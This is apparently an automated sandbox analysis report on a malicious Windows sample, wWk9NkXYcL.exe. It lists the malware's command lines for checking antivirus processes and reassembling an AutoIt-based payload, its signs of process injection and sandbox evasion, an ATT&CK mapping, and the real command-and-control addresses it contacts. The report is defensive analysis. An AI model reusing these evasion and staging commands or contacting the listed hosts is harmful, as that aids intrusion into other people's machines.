Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C58F4124 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Code function: 0_2_0040400B GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C58EC46C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Code function: 0_2_00402218 CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C58F368C CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Mutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_13
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1964:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | File created: C:\Users\user~1\AppData\Local\Temp\nskEC.tmp
Source: wWk9NkXYcL.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: wWk9NkXYcL.exe | ReversingLabs: Detection: 34%
Source: wWk9NkXYcL.exe | String found in binary or memory: s/Add:
Source: wWk9NkXYcL.exe | String found in binary or memory: -fns/_lib/addLead"
Source: wWk9NkXYcL.exe | String found in binary or memory: /AddJ
Source: wWk9NkXYcL.exe | String found in binary or memory: in-add
Source: wWk9NkXYcL.exe | String found in binary or memory: ./Add+6
Source: wWk9NkXYcL.exe | String found in binary or memory: ./Add+6s
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | File read: C:\Users\user\Desktop\wWk9NkXYcL.exe
Source: unknown | Process created: C:\Users\user\Desktop\wWk9NkXYcL.exe "C:\Users\user\Desktop\wWk9NkXYcL.exe"
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 473638
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MaskBathroomCompositionInjection" Participants
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\They + ..\Florence + ..\Astrology + ..\Attributes + ..\Connect + ..\This + ..\Residents + ..\Staff + ..\Net + ..\Funded + ..\Laughing + ..\Reviewing + ..\Bullet + ..\Amendment + ..\Notre + ..\Beside + ..\Hc + ..\Heavily + ..\Spirit + ..\Contribution + ..\Dictionaries + ..\Simply + ..\Infants + ..\Music + ..\Right + ..\Fox + ..\Firewall + ..\Mint Q
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\473638\Element.pif Element.pif Q
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Process created: C:\Users\user\AppData\Local\Temp\473638\Element.pif C:\Users\user~1\AppData\Local\Temp\473638\Element.pif
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: wWk9NkXYcL.exe | Static file information: File size 23265280 > 1048576
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Code function: 0_2_00405BBF GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_0000021925C76068 push rsi; ret 21_2_0000021925C76078
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C58A76AD push rdi; ret 21_2_00007FF6C58A76B4
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C58A7149 push rdi; ret 21_2_00007FF6C58A7152

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\473638\Element.pif
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C5894364 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | API coverage: 0.7 %
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Code function: 0_2_00405B98 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Code function: 0_2_00406559 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\Desktop\wWk9NkXYcL.exe | Code function: 0_2_004029F1 FindFirstFileW
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C58ECE3C GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C58B2DE0 FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C5875C44 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user~1\AppData\Local\Temp\473638
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user~1\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user~1\AppData\Local\Temp\473638\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user~1\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user~1\AppData\
Source: Element.pif, 00000015.00000002.2502705369.0000021925E50000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925EA2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_0000021925D4C004 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C5895A40 GetLastError,IsDebuggerPresent,OutputDebugStringW
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_0000021925D6E0C0 HeapAlloc,GetProcessHeap
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_0000021925D6E190 RtlLookupFunctionEntry,SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_0000021925D6E1B0 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_0000021925D6E1A0 IsDebuggerPresent,SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C589566C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C5895850 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C58B8E74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C58AAD08 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtQuerySystemInformation: Direct from: 0x7FF6C5894924
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtQueryAttributesFile: Direct from: 0x7FF6C58ED642
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtQueryInformationToken: Direct from: 0x7FF6C5903508
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtClose: Direct from: 0x7FF6C58EC3CD
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtProtectVirtualMemory: Direct from: 0x7FF6C58AB26C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtClose: Direct from: 0x7FF6C58EC5C7
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtDelayExecution: Direct from: 0x7FF6C5881C92
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtOpenFile: Direct from: 0x7FF6C58EC37B
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtUnmapViewOfSection: Direct from: 0x7FF6C58EC508
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtQuerySystemInformation: Direct from: 0x7FFB2CE826A1
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtProtectVirtualMemory: Direct from: 0x7FF6C5898FF0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtDelayExecution: Direct from: 0x7FF6C58EDFD8
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtQuerySystemInformation: Direct from: 0x7FF6C58EC4AD
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtUnmapViewOfSection: Direct from: 0x7FF6C58EC4BD
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | NtProtectVirtualMemory: Direct from: 0x7FF6C58783B5
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Memory written: C:\Users\user\AppData\Local\Temp\473638\Element.pif base: 21925C50000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Thread register set: target process: 6196
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Code function: 21_2_00007FF6C5873B64 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\they + ..\florence + ..\astrology + ..\attributes + ..\connect + ..\this + ..\residents + ..\staff + ..\net + ..\funded + ..\laughing + ..\reviewing + ..\bullet + ..\amendment + ..\notre + ..\beside + ..\hc + ..\heavily + ..\spirit + ..\contribution + ..\dictionaries + ..\simply + ..\infants + ..\music + ..\right + ..\fox + ..\firewall + ..\mint q
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\they + ..\florence + ..\astrology + ..\attributes + ..\connect + ..\this + ..\residents + ..\staff + ..\net + ..\funded + ..\laughing + ..\reviewing + ..\bullet + ..\amendment + ..\notre + ..\beside + ..\hc + ..\heavily + ..\spirit + ..\contribution + ..\dictionaries + ..\simply + ..\infants + ..\music + ..\right + ..\fox + ..\firewall + ..\mint qJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58DDB9C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,21_2_00007FF6C58DDB9C
Source: Element.pif, 00000011.00000000.1272060591.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp, Element.pif, 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp, Rick.0.dr, Element.pif.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Element.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58AFBB0 cpuid 21_2_00007FF6C58AFBB0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_0000021925D5E2FC
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_0000021925D5E118
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: EnumSystemLocalesW,21_2_0000021925D5DCE0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: EnumSystemLocalesW,21_2_0000021925D5DC10
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: GetLocaleInfoW,21_2_0000021925D56D38
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,21_2_0000021925D5D8B4
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: EnumSystemLocalesW,21_2_0000021925D569A4
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925CD5AFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,21_2_0000021925CD5AFC
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58B2290 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,21_2_00007FF6C58B2290
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00405C70 GlobalAlloc,lstrlenW,GetVersionExW,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GlobalFree,lstrcpyW,OpenProcess,CloseHandle,CharUpperW,lstrcmpW,GlobalFree,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,lstrcmpW,CloseHandle,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,0_2_00405C70
MITRE ATT&CK matrix by tactic (digits preceding a technique name are the report's hit-count badges for that technique):
  • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
  • Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
  • Execution: 1 Windows Management Instrumentation; 12 Command and Scripting Interpreter; 1 Native API; Cron; Launchd; Scheduled Task; Systemd Timers
  • Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
  • Privilege Escalation: 1 Exploitation for Privilege Escalation; 212 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items
  • Defense Evasion: 1 Masquerading; 1 Virtualization/Sandbox Evasion; 212 Process Injection; 1 Abuse Elevation Control Mechanism; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Compile After Delivery
  • Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
  • Discovery: 2 System Time Discovery; 41 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery; 3 File and Directory Discovery; 26 System Information Discovery
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
  • Collection: 11 Input Capture; 1 Archive Collected Data; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
  • Command and Control: 2 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
  • Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1510359 | Sample: wWk9NkXYcL.exe | Start date: 12/09/2024 | Architecture: WINDOWS | Score: 100
  • DNS: aSrgKXZxBg.aSrgKXZxBg
  • Sample-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 3 other signatures
  • wWk9NkXYcL.exe (started)
    • dropped: C:\Users\user\AppData\Local\Temp\Connect (COM); C:\Users\user\AppData\Local\Temp\This (data); C:\Users\user\AppData\Local\Temp\They (data); 25 other malicious files
    • signature: Writes many files with high entropy
    • cmd.exe (started)
      • dropped: C:\Users\user\AppData\Local\...lement.pif (PE32+)
      • signatures: Drops PE files with a suspicious file extension; Writes many files with high entropy
      • Element.pif (started)
        • signatures: Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes; Found direct / indirect Syscall (likely to bypass EDR)
        • Element.pif (started, child of the first Element.pif)
          • network: 195.10.205.48 port 80 (source port 49704), TSSCOM-ASRU, Russian Federation; 193.233.232.86 port 80 (source port 49705), FREE-NET-ASFREEnetEU, Russian Federation
          • WerFault.exe (started)
      • cmd.exe (started)
        • dropped: C:\Users\user\AppData\Local\Temp\473638\Q (data)
      • conhost.exe (started)
      • 7 other processes (started)

Source | Detection | Scanner | Label
wWk9NkXYcL.exe | 34% | ReversingLabs | Win32.Trojan.Generic
wWk9NkXYcL.exe | 100% | Avira | TR/AVI.Agent.krnfv
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\473638\Element.pif | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\Connect | 0% | ReversingLabs | -
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
http://193.233.232.86/api/crazyfish.phpdll | 0% | Avira URL Cloud | safe
http://crl.entrust.net/g2ca.crl0 | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net02 | 0% | Avira URL Cloud | safe
http://www.entrust.net/rpa03 | 0% | Avira URL Cloud | safe
https://github.-1/ | 0% | Avira URL Cloud | safe
https://github.-1 | 0% | Avira URL Cloud | safe
https://www.youtube.$ | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net00 | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net01 | 0% | Avira URL Cloud | safe
https://github.com | 0% | Avira URL Cloud | safe
https://github.co( | 0% | Avira URL Cloud | safe
https://fb.me/%3 | 0% | Avira URL Cloud | safe
http://www.autoitscript.com/autoit3/X | 0% | Avira URL Cloud | safe
http://www.autoitscript.com/autoit3/ | 0% | Avira URL Cloud | safe
https://www.autoitscript.com/autoit3/ | 0% | Avira URL Cloud | safe
http://195.10.205.48/:% | 0% | Avira URL Cloud | safe
http://195.10.205.48/api/crazyfish.php | 100% | Avira URL Cloud | malware
http://195.10.205.48/api/crazyfish.php.A | 0% | Avira URL Cloud | safe
https://github.2& | 0% | Avira URL Cloud | safe
https://ipgeolocation.io/ | 0% | Avira URL Cloud | safe
https://github.3 | 0% | Avira URL Cloud | safe
https://github.2 | 0% | Avira URL Cloud | safe
https://github.2C | 0% | Avira URL Cloud | safe
http://crl.entrust.net/csbr1.crl0 | 0% | Avira URL Cloud | safe
https://github.co.L | 0% | Avira URL Cloud | safe
https://mdn.io//1 | 0% | Avira URL Cloud | safe
https://github.- | 0% | Avira URL Cloud | safe
https://ipinfo.io/ | 0% | Avira URL Cloud | safe
https://github./ | 0% | Avira URL Cloud | safe
https://github.com/ | 0% | Avira URL Cloud | safe
https://ipinfo.io/https://ipgeolocation.io/0 | 0% | Avira URL Cloud | safe
https://github.com4 | 0% | Avira URL Cloud | safe
http://193.233.232.86/ | 0% | Avira URL Cloud | safe
http://193.233.232.86:80/api/crazyfish.php1 | 0% | Avira URL Cloud | safe
